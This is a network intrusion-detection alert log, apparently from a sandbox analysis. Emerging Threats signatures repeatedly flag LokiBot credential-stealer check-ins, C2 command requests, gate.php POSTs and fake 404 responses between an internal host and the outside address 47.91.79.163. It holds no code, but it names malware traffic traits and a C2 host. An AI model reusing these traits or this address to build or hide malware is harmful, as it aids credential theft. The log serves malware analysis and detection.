                                    12/03/20-10:02:38.904768TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4973180192.168.2.347.91.79.163
                                    12/03/20-10:02:38.965207TCP2025483ET TROJAN LokiBot Fake 404 Response804973147.91.79.163192.168.2.3
                                    12/03/20-10:02:39.202320TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973480192.168.2.347.91.79.163
                                    12/03/20-10:02:39.202320TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973480192.168.2.347.91.79.163
                                    12/03/20-10:02:39.202320TCP2025381ET TROJAN LokiBot Checkin4973480192.168.2.347.91.79.163
                                    12/03/20-10:02:39.202320TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973480192.168.2.347.91.79.163
                                    12/03/20-10:02:39.202320TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4973480192.168.2.347.91.79.163
                                    12/03/20-10:02:39.261558TCP2025483ET TROJAN LokiBot Fake 404 Response804973447.91.79.163192.168.2.3
                                    12/03/20-10:02:39.538013TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973580192.168.2.347.91.79.163
                                    12/03/20-10:02:39.538013TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973580192.168.2.347.91.79.163
                                    12/03/20-10:02:39.538013TCP2025381ET TROJAN LokiBot Checkin4973580192.168.2.347.91.79.163
                                    12/03/20-10:02:39.538013TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973580192.168.2.347.91.79.163
                                    12/03/20-10:02:39.538013TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4973580192.168.2.347.91.79.163
                                    12/03/20-10:02:39.596359TCP2025483ET TROJAN LokiBot Fake 404 Response804973547.91.79.163192.168.2.3
                                    12/03/20-10:02:39.856527TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973680192.168.2.347.91.79.163
                                    12/03/20-10:02:39.856527TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973680192.168.2.347.91.79.163
                                    12/03/20-10:02:39.856527TCP2025381ET TROJAN LokiBot Checkin4973680192.168.2.347.91.79.163
                                    12/03/20-10:02:39.856527TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973680192.168.2.347.91.79.163
                                    12/03/20-10:02:39.856527TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4973680192.168.2.347.91.79.163
                                    12/03/20-10:02:39.914695TCP2025483ET TROJAN LokiBot Fake 404 Response804973647.91.79.163192.168.2.3
                                    12/03/20-10:02:40.172331TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973980192.168.2.347.91.79.163
                                    12/03/20-10:02:40.172331TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973980192.168.2.347.91.79.163
                                    12/03/20-10:02:40.172331TCP2025381ET TROJAN LokiBot Checkin4973980192.168.2.347.91.79.163
                                    12/03/20-10:02:40.172331TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973980192.168.2.347.91.79.163
                                    12/03/20-10:02:40.172331TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4973980192.168.2.347.91.79.163
                                    12/03/20-10:02:40.234574TCP2025483ET TROJAN LokiBot Fake 404 Response804973947.91.79.163192.168.2.3
                                    12/03/20-10:02:40.464316TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974080192.168.2.347.91.79.163
                                    12/03/20-10:02:40.464316TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974080192.168.2.347.91.79.163
                                    12/03/20-10:02:40.464316TCP2025381ET TROJAN LokiBot Checkin4974080192.168.2.347.91.79.163
                                    12/03/20-10:02:40.464316TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974080192.168.2.347.91.79.163
                                    12/03/20-10:02:40.464316TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4974080192.168.2.347.91.79.163
                                    12/03/20-10:02:40.524907TCP2025483ET TROJAN LokiBot Fake 404 Response804974047.91.79.163192.168.2.3
                                    12/03/20-10:02:40.771995TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974280192.168.2.347.91.79.163
                                    12/03/20-10:02:40.771995TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974280192.168.2.347.91.79.163
                                    12/03/20-10:02:40.771995TCP2025381ET TROJAN LokiBot Checkin4974280192.168.2.347.91.79.163
                                    12/03/20-10:02:40.771995TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974280192.168.2.347.91.79.163
                                    12/03/20-10:02:40.771995TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4974280192.168.2.347.91.79.163
                                    12/03/20-10:02:40.829598TCP2025483ET TROJAN LokiBot Fake 404 Response804974247.91.79.163192.168.2.3
                                    12/03/20-10:02:41.097711TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974380192.168.2.347.91.79.163
                                    12/03/20-10:02:41.097711TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974380192.168.2.347.91.79.163
                                    12/03/20-10:02:41.097711TCP2025381ET TROJAN LokiBot Checkin4974380192.168.2.347.91.79.163
                                    12/03/20-10:02:41.097711TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974380192.168.2.347.91.79.163
                                    12/03/20-10:02:41.097711TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4974380192.168.2.347.91.79.163
                                    12/03/20-10:02:41.155303TCP2025483ET TROJAN LokiBot Fake 404 Response804974347.91.79.163192.168.2.3
                                    12/03/20-10:02:41.418474TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974480192.168.2.347.91.79.163
                                    12/03/20-10:02:41.418474TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974480192.168.2.347.91.79.163
                                    12/03/20-10:02:41.418474TCP2025381ET TROJAN LokiBot Checkin4974480192.168.2.347.91.79.163
                                    12/03/20-10:02:41.418474TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974480192.168.2.347.91.79.163
                                    12/03/20-10:02:41.418474TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4974480192.168.2.347.91.79.163
                                    12/03/20-10:02:41.476969TCP2025483ET TROJAN LokiBot Fake 404 Response804974447.91.79.163192.168.2.3
                                    12/03/20-10:02:41.727267TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974780192.168.2.347.91.79.163
                                    12/03/20-10:02:41.727267TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974780192.168.2.347.91.79.163
                                    12/03/20-10:02:41.727267TCP2025381ET TROJAN LokiBot Checkin4974780192.168.2.347.91.79.163
                                    12/03/20-10:02:41.727267TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974780192.168.2.347.91.79.163
                                    12/03/20-10:02:41.727267TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4974780192.168.2.347.91.79.163
                                    12/03/20-10:02:41.777842TCP2025483ET TROJAN LokiBot Fake 404 Response804974747.91.79.163192.168.2.3
                                    12/03/20-10:02:42.032912TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974880192.168.2.347.91.79.163
                                    12/03/20-10:02:42.032912TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974880192.168.2.347.91.79.163
                                    12/03/20-10:02:42.032912TCP2025381ET TROJAN LokiBot Checkin4974880192.168.2.347.91.79.163
                                    12/03/20-10:02:42.032912TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974880192.168.2.347.91.79.163
                                    12/03/20-10:02:42.032912TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4974880192.168.2.347.91.79.163
                                    12/03/20-10:02:42.092413TCP2025483ET TROJAN LokiBot Fake 404 Response804974847.91.79.163192.168.2.3
                                    12/03/20-10:02:42.331415TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974980192.168.2.347.91.79.163
                                    12/03/20-10:02:42.331415TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974980192.168.2.347.91.79.163
                                    12/03/20-10:02:42.331415TCP2025381ET TROJAN LokiBot Checkin4974980192.168.2.347.91.79.163
                                    12/03/20-10:02:42.331415TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974980192.168.2.347.91.79.163
                                    12/03/20-10:02:42.331415TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4974980192.168.2.347.91.79.163
                                    12/03/20-10:02:42.389556TCP2025483ET TROJAN LokiBot Fake 404 Response804974947.91.79.163192.168.2.3
                                    12/03/20-10:02:42.653877TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975080192.168.2.347.91.79.163
                                    12/03/20-10:02:42.653877TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975080192.168.2.347.91.79.163
                                    12/03/20-10:02:42.653877TCP2025381ET TROJAN LokiBot Checkin4975080192.168.2.347.91.79.163
                                    12/03/20-10:02:42.653877TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975080192.168.2.347.91.79.163
                                    12/03/20-10:02:42.653877TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4975080192.168.2.347.91.79.163
                                    12/03/20-10:02:42.717299TCP2025483ET TROJAN LokiBot Fake 404 Response804975047.91.79.163192.168.2.3
                                    12/03/20-10:02:42.984814TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975180192.168.2.347.91.79.163
                                    12/03/20-10:02:42.984814TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975180192.168.2.347.91.79.163
                                    12/03/20-10:02:42.984814TCP2025381ET TROJAN LokiBot Checkin4975180192.168.2.347.91.79.163
                                    12/03/20-10:02:42.984814TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975180192.168.2.347.91.79.163
                                    12/03/20-10:02:42.984814TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4975180192.168.2.347.91.79.163
                                    12/03/20-10:02:43.050733TCP2025483ET TROJAN LokiBot Fake 404 Response804975147.91.79.163192.168.2.3
                                    12/03/20-10:02:43.283331TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975280192.168.2.347.91.79.163
                                    12/03/20-10:02:43.283331TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975280192.168.2.347.91.79.163
                                    12/03/20-10:02:43.283331TCP2025381ET TROJAN LokiBot Checkin4975280192.168.2.347.91.79.163
                                    12/03/20-10:02:43.283331TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975280192.168.2.347.91.79.163
                                    12/03/20-10:02:43.283331TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4975280192.168.2.347.91.79.163
                                    12/03/20-10:02:43.342667TCP2025483ET TROJAN LokiBot Fake 404 Response804975247.91.79.163192.168.2.3
                                    12/03/20-10:02:43.612446TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975580192.168.2.347.91.79.163
                                    12/03/20-10:02:43.612446TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975580192.168.2.347.91.79.163
                                    12/03/20-10:02:43.612446TCP2025381ET TROJAN LokiBot Checkin4975580192.168.2.347.91.79.163
                                    12/03/20-10:02:43.612446TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975580192.168.2.347.91.79.163
                                    12/03/20-10:02:43.612446TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4975580192.168.2.347.91.79.163
                                    12/03/20-10:02:43.673909TCP2025483ET TROJAN LokiBot Fake 404 Response804975547.91.79.163192.168.2.3
                                    12/03/20-10:02:43.931445TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975680192.168.2.347.91.79.163
                                    12/03/20-10:02:43.931445TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975680192.168.2.347.91.79.163
                                    12/03/20-10:02:43.931445TCP2025381ET TROJAN LokiBot Checkin4975680192.168.2.347.91.79.163
                                    12/03/20-10:02:43.931445TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975680192.168.2.347.91.79.163
                                    12/03/20-10:02:43.931445TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4975680192.168.2.347.91.79.163
                                    12/03/20-10:02:43.995368TCP2025483ET TROJAN LokiBot Fake 404 Response804975647.91.79.163192.168.2.3
                                    12/03/20-10:02:44.249687TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975880192.168.2.347.91.79.163
                                    12/03/20-10:02:44.249687TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975880192.168.2.347.91.79.163
                                    12/03/20-10:02:44.249687TCP2025381ET TROJAN LokiBot Checkin4975880192.168.2.347.91.79.163
                                    12/03/20-10:02:44.249687TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975880192.168.2.347.91.79.163
                                    12/03/20-10:02:44.249687TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4975880192.168.2.347.91.79.163
                                    12/03/20-10:02:44.316339TCP2025483ET TROJAN LokiBot Fake 404 Response804975847.91.79.163192.168.2.3
                                    12/03/20-10:02:44.661642TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975980192.168.2.347.91.79.163
                                    12/03/20-10:02:44.661642TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975980192.168.2.347.91.79.163
                                    12/03/20-10:02:44.661642TCP2025381ET TROJAN LokiBot Checkin4975980192.168.2.347.91.79.163
                                    12/03/20-10:02:44.661642TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975980192.168.2.347.91.79.163
                                    12/03/20-10:02:44.661642TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4975980192.168.2.347.91.79.163
                                    12/03/20-10:02:44.797400TCP2025483ET TROJAN LokiBot Fake 404 Response804975947.91.79.163192.168.2.3
                                    12/03/20-10:02:45.021438TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976080192.168.2.347.91.79.163
                                    12/03/20-10:02:45.021438TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976080192.168.2.347.91.79.163
                                    12/03/20-10:02:45.021438TCP2025381ET TROJAN LokiBot Checkin4976080192.168.2.347.91.79.163
                                    12/03/20-10:02:45.021438TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976080192.168.2.347.91.79.163
                                    12/03/20-10:02:45.021438TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976080192.168.2.347.91.79.163
                                    12/03/20-10:02:45.078031TCP2025483ET TROJAN LokiBot Fake 404 Response804976047.91.79.163192.168.2.3
                                    12/03/20-10:02:45.361002TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976180192.168.2.347.91.79.163
                                    12/03/20-10:02:45.361002TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976180192.168.2.347.91.79.163
                                    12/03/20-10:02:45.361002TCP2025381ET TROJAN LokiBot Checkin4976180192.168.2.347.91.79.163
                                    12/03/20-10:02:45.361002TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976180192.168.2.347.91.79.163
                                    12/03/20-10:02:45.361002TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976180192.168.2.347.91.79.163
                                    12/03/20-10:02:45.419547TCP2025483ET TROJAN LokiBot Fake 404 Response804976147.91.79.163192.168.2.3
                                    12/03/20-10:02:45.691222TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976280192.168.2.347.91.79.163
                                    12/03/20-10:02:45.691222TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976280192.168.2.347.91.79.163
                                    12/03/20-10:02:45.691222TCP2025381ET TROJAN LokiBot Checkin4976280192.168.2.347.91.79.163
                                    12/03/20-10:02:45.691222TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976280192.168.2.347.91.79.163
                                    12/03/20-10:02:45.691222TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976280192.168.2.347.91.79.163
                                    12/03/20-10:02:45.752643TCP2025483ET TROJAN LokiBot Fake 404 Response804976247.91.79.163192.168.2.3
                                    12/03/20-10:02:46.008231TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976380192.168.2.347.91.79.163
                                    12/03/20-10:02:46.008231TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976380192.168.2.347.91.79.163
                                    12/03/20-10:02:46.008231TCP2025381ET TROJAN LokiBot Checkin4976380192.168.2.347.91.79.163
                                    12/03/20-10:02:46.008231TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976380192.168.2.347.91.79.163
                                    12/03/20-10:02:46.008231TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976380192.168.2.347.91.79.163
                                    12/03/20-10:02:46.068412TCP2025483ET TROJAN LokiBot Fake 404 Response804976347.91.79.163192.168.2.3
                                    12/03/20-10:02:46.321986TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976480192.168.2.347.91.79.163
                                    12/03/20-10:02:46.321986TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976480192.168.2.347.91.79.163
                                    12/03/20-10:02:46.321986TCP2025381ET TROJAN LokiBot Checkin4976480192.168.2.347.91.79.163
                                    12/03/20-10:02:46.321986TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976480192.168.2.347.91.79.163
                                    12/03/20-10:02:46.321986TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976480192.168.2.347.91.79.163
                                    12/03/20-10:02:46.384203TCP2025483ET TROJAN LokiBot Fake 404 Response804976447.91.79.163192.168.2.3
                                    12/03/20-10:02:46.623971TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976580192.168.2.347.91.79.163
                                    12/03/20-10:02:46.623971TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976580192.168.2.347.91.79.163
                                    12/03/20-10:02:46.623971TCP2025381ET TROJAN LokiBot Checkin4976580192.168.2.347.91.79.163
                                    12/03/20-10:02:46.623971TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976580192.168.2.347.91.79.163
                                    12/03/20-10:02:46.623971TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976580192.168.2.347.91.79.163
                                    12/03/20-10:02:46.686219TCP2025483ET TROJAN LokiBot Fake 404 Response804976547.91.79.163192.168.2.3
                                    12/03/20-10:02:46.941907TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976680192.168.2.347.91.79.163
                                    12/03/20-10:02:46.941907TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976680192.168.2.347.91.79.163
                                    12/03/20-10:02:46.941907TCP2025381ET TROJAN LokiBot Checkin4976680192.168.2.347.91.79.163
                                    12/03/20-10:02:46.941907TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976680192.168.2.347.91.79.163
                                    12/03/20-10:02:46.941907TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976680192.168.2.347.91.79.163
                                    12/03/20-10:02:47.002928TCP2025483ET TROJAN LokiBot Fake 404 Response804976647.91.79.163192.168.2.3
                                    12/03/20-10:02:47.207696TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976780192.168.2.347.91.79.163
                                    12/03/20-10:02:47.207696TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976780192.168.2.347.91.79.163
                                    12/03/20-10:02:47.207696TCP2025381ET TROJAN LokiBot Checkin4976780192.168.2.347.91.79.163
                                    12/03/20-10:02:47.207696TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976780192.168.2.347.91.79.163
                                    12/03/20-10:02:47.207696TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976780192.168.2.347.91.79.163
                                    12/03/20-10:02:47.267355TCP2025483ET TROJAN LokiBot Fake 404 Response804976747.91.79.163192.168.2.3
                                    12/03/20-10:02:47.508868TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976880192.168.2.347.91.79.163
                                    12/03/20-10:02:47.508868TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976880192.168.2.347.91.79.163
                                    12/03/20-10:02:47.508868TCP2025381ET TROJAN LokiBot Checkin4976880192.168.2.347.91.79.163
                                    12/03/20-10:02:47.508868TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976880192.168.2.347.91.79.163
                                    12/03/20-10:02:47.508868TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976880192.168.2.347.91.79.163
                                    12/03/20-10:02:47.583864TCP2025483ET TROJAN LokiBot Fake 404 Response804976847.91.79.163192.168.2.3
                                    12/03/20-10:02:47.814806TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976980192.168.2.347.91.79.163
                                    12/03/20-10:02:47.814806TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976980192.168.2.347.91.79.163
                                    12/03/20-10:02:47.814806TCP2025381ET TROJAN LokiBot Checkin4976980192.168.2.347.91.79.163
                                    12/03/20-10:02:47.814806TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976980192.168.2.347.91.79.163
                                    12/03/20-10:02:47.814806TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976980192.168.2.347.91.79.163
                                    12/03/20-10:02:47.873611TCP2025483ET TROJAN LokiBot Fake 404 Response804976947.91.79.163192.168.2.3
                                    12/03/20-10:02:48.133006TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977080192.168.2.347.91.79.163
                                    12/03/20-10:02:48.133006TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977080192.168.2.347.91.79.163
                                    12/03/20-10:02:48.133006TCP2025381ET TROJAN LokiBot Checkin4977080192.168.2.347.91.79.163
                                    12/03/20-10:02:48.133006TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977080192.168.2.347.91.79.163
                                    12/03/20-10:02:48.133006TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4977080192.168.2.347.91.79.163
                                    12/03/20-10:02:48.194022TCP2025483ET TROJAN LokiBot Fake 404 Response804977047.91.79.163192.168.2.3
                                    12/03/20-10:02:48.431387TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977180192.168.2.347.91.79.163
                                    12/03/20-10:02:48.431387TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977180192.168.2.347.91.79.163
                                    12/03/20-10:02:48.431387TCP2025381ET TROJAN LokiBot Checkin4977180192.168.2.347.91.79.163
                                    12/03/20-10:02:48.431387TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977180192.168.2.347.91.79.163
                                    12/03/20-10:02:48.431387TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4977180192.168.2.347.91.79.163
                                    12/03/20-10:02:48.492338TCP2025483ET TROJAN LokiBot Fake 404 Response804977147.91.79.163192.168.2.3
                                    12/03/20-10:02:48.713865TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977280192.168.2.347.91.79.163
                                    12/03/20-10:02:48.713865TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977280192.168.2.347.91.79.163
                                    12/03/20-10:02:48.713865TCP2025381ET TROJAN LokiBot Checkin4977280192.168.2.347.91.79.163
                                    12/03/20-10:02:48.713865TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977280192.168.2.347.91.79.163
                                    12/03/20-10:02:48.713865TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4977280192.168.2.347.91.79.163
                                    12/03/20-10:02:48.774088TCP2025483ET TROJAN LokiBot Fake 404 Response804977247.91.79.163192.168.2.3
                                    12/03/20-10:02:49.003810TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977380192.168.2.347.91.79.163
                                    12/03/20-10:02:49.003810TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977380192.168.2.347.91.79.163
                                    12/03/20-10:02:49.003810TCP2025381ET TROJAN LokiBot Checkin4977380192.168.2.347.91.79.163
                                    12/03/20-10:02:49.003810TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977380192.168.2.347.91.79.163
                                    12/03/20-10:02:49.003810TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4977380192.168.2.347.91.79.163
                                    12/03/20-10:02:49.067828TCP2025483ET TROJAN LokiBot Fake 404 Response804977347.91.79.163192.168.2.3
                                    12/03/20-10:02:49.292978TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977480192.168.2.347.91.79.163
                                    12/03/20-10:02:49.292978TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977480192.168.2.347.91.79.163
                                    12/03/20-10:02:49.292978TCP2025381ET TROJAN LokiBot Checkin4977480192.168.2.347.91.79.163
                                    12/03/20-10:02:49.292978TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977480192.168.2.347.91.79.163
                                    12/03/20-10:02:49.292978TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4977480192.168.2.347.91.79.163
                                    12/03/20-10:02:49.354669TCP2025483ET TROJAN LokiBot Fake 404 Response804977447.91.79.163192.168.2.3
                                    12/03/20-10:02:49.591345TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977580192.168.2.347.91.79.163
                                    12/03/20-10:02:49.591345TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977580192.168.2.347.91.79.163
                                    12/03/20-10:02:49.591345TCP2025381ET TROJAN LokiBot Checkin4977580192.168.2.347.91.79.163
                                    12/03/20-10:02:49.591345TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977580192.168.2.347.91.79.163
                                    12/03/20-10:02:49.591345TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4977580192.168.2.347.91.79.163
                                    12/03/20-10:02:49.830853TCP2025483ET TROJAN LokiBot Fake 404 Response804977547.91.79.163192.168.2.3
                                    12/03/20-10:02:50.060344TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977680192.168.2.347.91.79.163
                                    12/03/20-10:02:50.060344TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977680192.168.2.347.91.79.163
                                    12/03/20-10:02:50.060344TCP2025381ET TROJAN LokiBot Checkin4977680192.168.2.347.91.79.163
                                    12/03/20-10:02:50.060344TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977680192.168.2.347.91.79.163
                                    12/03/20-10:02:50.060344TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4977680192.168.2.347.91.79.163
                                    12/03/20-10:02:50.125688TCP2025483ET TROJAN LokiBot Fake 404 Response804977647.91.79.163192.168.2.3
                                    12/03/20-10:02:50.360535TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977780192.168.2.347.91.79.163
                                    12/03/20-10:02:50.360535TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977780192.168.2.347.91.79.163
                                    12/03/20-10:02:50.360535TCP2025381ET TROJAN LokiBot Checkin4977780192.168.2.347.91.79.163
                                    12/03/20-10:02:50.360535TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977780192.168.2.347.91.79.163
                                    12/03/20-10:02:50.360535TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4977780192.168.2.347.91.79.163
                                    12/03/20-10:02:50.424430TCP2025483ET TROJAN LokiBot Fake 404 Response804977747.91.79.163192.168.2.3
                                    12/03/20-10:02:50.664605TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977880192.168.2.347.91.79.163
                                    12/03/20-10:02:50.664605TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977880192.168.2.347.91.79.163
                                    12/03/20-10:02:50.664605TCP2025381ET TROJAN LokiBot Checkin4977880192.168.2.347.91.79.163
                                    12/03/20-10:02:50.664605TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977880192.168.2.347.91.79.163
                                    12/03/20-10:02:50.664605TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4977880192.168.2.347.91.79.163
                                    12/03/20-10:02:50.723849TCP2025483ET TROJAN LokiBot Fake 404 Response804977847.91.79.163192.168.2.3
                                    12/03/20-10:02:50.972122TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977980192.168.2.347.91.79.163
                                    12/03/20-10:02:50.972122TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977980192.168.2.347.91.79.163
                                    12/03/20-10:02:50.972122TCP2025381ET TROJAN LokiBot Checkin4977980192.168.2.347.91.79.163
                                    12/03/20-10:02:50.972122TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977980192.168.2.347.91.79.163
                                    12/03/20-10:02:50.972122TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4977980192.168.2.347.91.79.163
                                    12/03/20-10:02:51.037888TCP2025483ET TROJAN LokiBot Fake 404 Response804977947.91.79.163192.168.2.3
                                    12/03/20-10:02:51.261332TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978080192.168.2.347.91.79.163
                                    12/03/20-10:02:51.261332TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978080192.168.2.347.91.79.163
                                    12/03/20-10:02:51.261332TCP2025381ET TROJAN LokiBot Checkin4978080192.168.2.347.91.79.163
                                    12/03/20-10:02:51.261332TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978080192.168.2.347.91.79.163
                                    12/03/20-10:02:51.261332TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978080192.168.2.347.91.79.163
                                    12/03/20-10:02:51.322457TCP2025483ET TROJAN LokiBot Fake 404 Response804978047.91.79.163192.168.2.3
                                    12/03/20-10:02:51.534736TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978180192.168.2.347.91.79.163
